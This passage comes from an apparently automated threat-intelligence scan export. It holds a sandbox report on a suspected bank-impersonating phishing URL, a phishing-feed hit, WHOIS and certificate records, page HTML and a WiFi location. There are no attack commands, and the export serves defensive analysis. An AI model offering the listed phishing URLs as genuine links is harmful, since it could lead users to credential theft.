"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6ac_ConnHashTable<1708>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6ac_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_6ac_IESQMMUTEX_0_331"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_6ac_ConnHashTable<1708>_HashTable_Mutex"\n 
"Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_6ac_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_1708"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_6ac_IESQMMUTEX_0_519"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "OF1UBMZL.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OF1UBMZL.txt]- [targetUID: 00000000-00003804]\n Dropped file: "2E0BQQCR.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2E0BQQCR.txt]- [targetUID: 00000000-00001708]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "OF1UBMZL.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\OF1UBMZL.txt]- [targetUID: 00000000-00003804]\n "_D5D21362-5F02-11ED-9265-080027EC57C5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFCA1499D1E2A66278.TMP" has type "data"- Location: [%TEMP%\\~DFCA1499D1E2A66278.TMP]- [targetUID: 00000000-00001708]\n 
"RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "down_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "errorPageStrings_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "bullet_1_" has type "PNG image data 15 x 15 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DFA5965846D60398AC.TMP" has type "data"- Location: [%TEMP%\\~DFA5965846D60398AC.TMP]- [targetUID: 00000000-00001708]\n "~DFFE404849249527B2.TMP" has type "data"- Location: [%TEMP%\\~DFFE404849249527B2.TMP]- [targetUID: 00000000-00001708]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "2E0BQQCR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2E0BQQCR.txt]- [targetUID: 00000000-00001708]\n "background_gradient_1_" has type "JPEG image data JFIF standard 1.02 aspect ratio density 100x100 segment length 16 baseline precision 8 1x800 components 3"- [targetUID: N/A]\n "_CBCF1377-5F02-11ED-9265-080027EC57C5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00001708]\n "ErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._CBCF1375-5F02-11ED-9265-080027EC57C5_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF332AB4CC922D1A60.TMP" has type "data"- Location: [%TEMP%\\~DF332AB4CC922D1A60.TMP]- [targetUID: 00000000-00001708]'}, {u'category': 
u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"HTTP/1.1 302 Moved Temporarily\nContent-Length: 0\nServer: Kestrel\nLocation: https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us\nRequest-Context: appId=cid-v1:7d63747b-487e-492a-872d-762362f77974\nX-Response-Cache-Status: True\nExpires: Tue, 08 Nov 2022 02:16:24 GMT\nCache-Control: max-age=0, no-cache, no-store\nPragma: no-cache\nDate: Tue, 08 Nov 2022 02:16:24 GMT\nConnection: keep-alive\nStrict-Transport-Security: max-age=31536000 ; includeSubDomains"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://mashreq-dispute-refund-edd7e6.netlify.app/"\n Pattern match: "https://mashreq-dispute-refund-edd7e6.netlify.app"\n Pattern match: "https://www.msn.com/spartan/ientpgbconfig?locale=en-us&market=us"'}], u'threat_level': 0, u'size': None, u'job_id': u'6369bb23c90e715df924df2e', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'suspicious_identifiers': [], u'attck_id': u'T1573', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Encrypted Channel', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'104.196.30.220', u'184.50.50.164'], 
u'sha256': u'45b03fe4427c993fcd3fd86ea0653b0e7cc007e8ad65e31581e62132e63f1e14', u'sha512': u'f2459ffd3027eab6323c80e5ca0b6a797f9d1095ed62fd365bd11cfe4249f3572511c926b2b58d3e78a537057ce3a9f5c7cc23433efb6650a3cf4a03799d3ad7', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://mashreq-dispute-refund-edd7e6.netlify.app/', u'submission_id': u'6369bb24c90e715df924df2f', u'created_at': u'2022-11-08T02:12:52+00:00', u'filename': None}], u'analysis_start_time': u'2022-11-08T02:12:52+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 2, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 7, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'af72a9839a79c4f79f56297858461027', u'network_mode': u'default', u'processes': [], u'sha1': u'997b927b8a2658babd3e07db566354809219e70b', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': []}] | 104.196.30.220 |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.10): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [008security.github.io]
https://www.openphish.com/feed.txt | 008security.github.io |
| 2023-05-12 03:18:06 | Externally Hosted Javascript | No | Page Information | 0 | 0 | 3 | 0 | None | https://www.google-analytics.com/analytics.js | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
.promo {
display: none;
/* display: table; */
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
z-index: 1;
overflow: auto;
color: lightblue;
background-color: rgba(0,0,0,0.4);
animation: promo-appear-animation 0.35s ease-out;
}
.promo-middle {
display: table-cell;
vertical-align: middle;
}
.promo-content {
width: 80vw;
height: 80vh;
max-width: 80vh;
max-height: 80vw;
margin: auto;
padding: 0;
font-size: 2.8vmax;
font-family: Futura, "Trebuchet MS", Arial, sans-serif;
text-align: center;
background-image: url("promo_back.png");
background-position: center;
background-repeat: no-repeat;
background-size: cover;
border-radius: 15px;
box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);
}
.promo-header {
height: 10%;
padding: 2px 16px;
}
.promo-close {
width: 10%;
height: 100%;
text-align: left;
float: left;
font-size: 1.3em;
/* transition: 0.2s; */
}
.promo-close:hover {
/* transform: scale(1.25); */
cursor: pointer;
}
.promo-body {
padding: 8px 16px 16px 16px;
margin: auto;
}
.promo-body p {
margin-top: 0;
mix-blend-mode: color-dodge;
}
.link {
width: 100%;
display: inline-block;
}
.link img {
width: 100%;
}
@keyframes promo-appear-animation {
0% {
transform: scale(2.0);
opacity: 0;
}
100% {
transform: scale(1.0);
opacity: 1;
}
}
</style>
<script>
window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)};ga.l=+new Date;
ga('create', 'UA-105392568-1', 'auto');
ga('send', 'pageview');
</script>
<script async src="https://www.google-analytics.com/analytics.js"></script>
</head>
<body>
<canvas></canvas>
<!-- Mother of God, pls forgive me -->
<div class="promo">
<div class="promo-middle">
<div class="promo-content">
<div class="promo-header">
<span class="promo-close">×</span>
</div>
<div class="promo-body">
<p>Try Fluid Simulation app!</p>
<div class="links-container">
<a class="link" id="apple_link" target="_blank">
<img class="link-img" alt="Download on the App Store" src="app_badge.png"/>
</a>
<a class="link" id="google_link" target="_blank">
<img class="link-img" alt="Get it on Google Play" src="gp_badge.png"/>
</a>
</div>
</div>
</div>
</div>
</div>
<script src="./script.js"></script>
</body>
</html> |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 7 | 0 | None | Domains By Proxy, LLC | Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2022-09-16T17:34:41Z
Creation Date: 2014-07-15T10:59:40Z
Registry Expiry Date: 2023-07-15T10:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: 480-624-2505
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-07-16T08:59:21Z
Creation Date: 2014-07-15T05:59:40Z
Registrar Registration Expiration Date: 2023-07-15T05:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | x-github-request-id: 70D2:0CB6:1A723F4:28AE86F:645DAA55 | {"content-length": "103646", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-63a06\"", "x-cache-hits": "0", "cache-control": "max-age=600", "x-served-by": "cache-ewr18167-EWR", "x-cache": "MISS", "x-github-request-id": "70D2:0CB6:1A723F4:28AE86F:645DAA55", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 03:04:13 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "4232179a2468cad7d8e788f0a4fe958396bfc091", "date": "Fri, 12 May 2023 02:54:13 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "0", "x-timer": "S1683860053.050131,VS0,VE21", "server": "GitHub.com", "connection": "keep-alive", "content-type": "application/javascript; charset=utf-8"} |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 74 | 0 | 1 | 0 | None | 188.114.96.1 | ayhu.xyz |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Apr 26 03:43:31.388 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:43:38:D1:BA:46:EB:FB:AE:E5:0E:F5:96:
0C:2E:94:E5:49:45:23:64:6A:0D:BD:FC:87:A8:B8:00:
87:FD:24:62:02:20:75:87:54:4A:DF:64:4F:88:2E:B1:
25:57:3C:E7:3A:E0:19:3B:72:E0:C9:1A:87:B9:BB:3F:
35:51:E8:55:8F:82
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 26 03:43:31.409 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:5D:9E:62:37:CB:DB:77:1F:86:0C:C3:56:
8B:76:28:CE:A6:09:34:6A:3E:14:48:88:F6:21:96:4B:
D9:19:A8:EE:02:21:00:BC:CD:90:3B:08:38:44:A5:BB:
D6:38:35:73:D2:AD:F4:37:33:C9:DB:0D:66:F0:E9:9B:
ED:6A:44:1F:1B:F5:8E
Signature Algorithm: sha256WithRSAEncryption
7c:fa:bc:17:47:a7:e5:00:0d:95:46:f6:aa:b8:5c:00:e2:ec:
d7:d1:7a:8b:68:b6:74:b4:92:6d:3d:5e:34:79:68:36:4b:b1:
22:bc:39:10:53:ed:b5:6d:cb:32:be:a6:64:84:36:56:88:b4:
46:53:a9:13:77:42:0f:15:bd:f9:cb:e5:28:5d:fb:7e:a2:45:
2c:88:d0:5e:f0:2b:7e:c6:76:b9:0b:22:71:21:a1:7c:97:5c:
3a:e6:c7:51:0e:74:ba:87:b5:20:a9:b3:67:69:9c:c8:fc:3e:
a3:b5:ad:ee:73:7a:3e:e4:18:0a:93:40:47:fa:a9:04:04:e1:
f7:88:c4:73:97:3f:0c:9b:41:a3:36:f3:ec:33:03:ab:0c:30:
00:c0:20:bd:7a:4b:9a:0b:2b:5b:6d:f2:ba:7f:cc:e9:7b:ea:
fb:92:46:62:0b:ad:ee:b0:ba:89:ac:82:3a:17:07:50:53:81:
b3:41:01:ce:5c:08:dd:10:1b:6c:39:d6:14:34:c6:10:a8:c1:
d6:c2:f7:02:f7:45:91:38:08:18:a2:cd:a4:11:ec:4f:45:cb:
9e:27:ab:1e:0d:3e:e8:66:62:38:57:e6:40:15:8a:71:ee:e2:
dc:77:56:dc:8b:57:bb:4b:a9:03:f5:23:c6:cf:0a:e7:07:60:
58:ae:4b:bd
| battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | roLAN (Net ID: 00:0F:B5:E5:CF:1E) | 50.8897, 6.0563 |
| 2023-05-12 03:10:04 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | beatrixhaller.at | beatrixhaller.at |
| 2023-05-12 02:56:32 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
26:cc:7f:01:c6:92:25:78:13:50:9e:48:80:75:15:57
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Mar 23 22:37:05 2023 GMT
Not After : Jun 21 22:37:04 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:aa:7b:81:42:e7:bb:ef:b8:0c:29:95:16:51:5f:
17:ef:12:01:ea:12:d1:38:f6:d6:ab:de:90:73:55:
a4:af:cb:7c:f7:08:2e:7f:ec:c7:d3:07:5d:b2:f5:
bb:41:e9:04:92:a8:3c:a4:cb:ef:73:55:b5:a9:bc:
5c:d1:be:26:4b:99:f3:8a:57:d8:c7:77:79:1d:0e:
70:31:81:bc:da:4a:73:41:e5:08:81:59:46:c7:d8:
68:74:56:c2:f6:64:23:af:1b:88:8f:72:bd:52:09:
2e:97:9b:f1:a4:cf:09:d8:89:91:91:ca:2e:06:41:
a2:84:ad:0d:6a:df:00:95:f5:ec:e2:1e:49:48:18:
0a:3f:98:fa:06:a5:50:9f:7c:2c:20:19:c1:55:cd:
77:d2:89:47:dd:a9:ee:13:f6:2f:e2:48:87:26:a5:
fd:85:17:06:37:b0:a9:d0:53:b4:4d:e3:4c:ec:0e:
83:60:b2:ad:ad:2d:44:08:30:33:b0:91:f7:b0:f8:
00:7f:d1:49:37:39:19:99:a3:59:5c:dc:4a:a0:c5:
bd:ef:ae:e1:d6:c3:40:3c:f6:35:0e:db:7b:df:4f:
54:c4:bd:f6:3a:2c:2b:ff:c9:5b:e5:d2:e9:69:24:
02:0b:f7:c6:94:a2:a1:ed:73:64:15:f9:25:08:00:
3b:85
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E7:35:7E:35:FD:7B:BC:32:B5:C0:52:8C:76:D9:7D:F0:37:0A:7A:3D
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/X4UdJFi-bqE
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/QCTFvWRh6mE.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
09:9f:cd:b5:43:3b:6a:2f:1d:c9:3b:c0:c8:50:40:4b:85:6c:
a4:67:c0:ea:9c:ed:fa:82:03:5a:15:d9:da:e2:17:9e:f5:4d:
17:b3:27:61:b6:b3:76:a2:5c:3c:dc:1f:ca:d1:cf:2a:8c:c5:
9f:e1:42:b1:ce:4f:6c:8b:d7:5b:5d:4a:1a:37:bf:f7:48:1c:
b0:1e:50:fd:1f:d7:83:b8:62:23:8e:ce:bc:13:38:47:cd:3d:
85:a8:0c:e6:2b:35:45:86:97:06:88:96:8f:aa:84:6c:ae:91:
25:1d:3c:c7:d6:f8:a1:4f:51:5e:ed:a9:fe:6b:22:98:84:a4:
ef:b4:d3:2f:02:db:9e:b8:fb:29:cc:58:62:ad:6f:ac:48:dc:
16:46:0c:14:b4:34:7b:60:f1:ec:27:16:2b:4e:4a:c3:37:36:
d0:34:81:c1:2b:54:8c:d5:17:57:ba:55:4c:71:58:26:4f:c6:
22:b8:65:ba:ad:e7:f5:f2:a8:04:c1:7d:df:11:ab:7d:f5:94:
7d:56:64:8a:41:7f:f4:d3:d7:1a:a0:c6:cc:e6:42:c8:ac:de:
6a:33:c1:21:70:bc:bd:6f:69:08:1f:8f:fa:9f:b7:aa:ca:2e:
e6:b7:8f:15:ac:fb:89:0e:c0:5f:c0:b9:df:e8:c0:15:b9:87:
ca:00:58:c5
| battleb0t.xyz |
